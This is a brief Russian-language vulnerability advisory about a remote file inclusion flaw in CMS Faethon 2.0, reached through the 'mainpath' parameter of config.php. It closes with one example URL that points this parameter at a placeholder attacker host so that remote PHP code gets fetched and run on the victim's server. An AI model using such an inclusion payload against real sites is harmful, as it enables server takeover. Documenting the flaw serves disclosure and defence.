Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: CMS Faethon 2.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "mainpath" сценарием config.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение опций «register_globals» и «magic_quotes_gpc».
Пример:
http://victim/admin/config.php?mainpath=http://evil_script?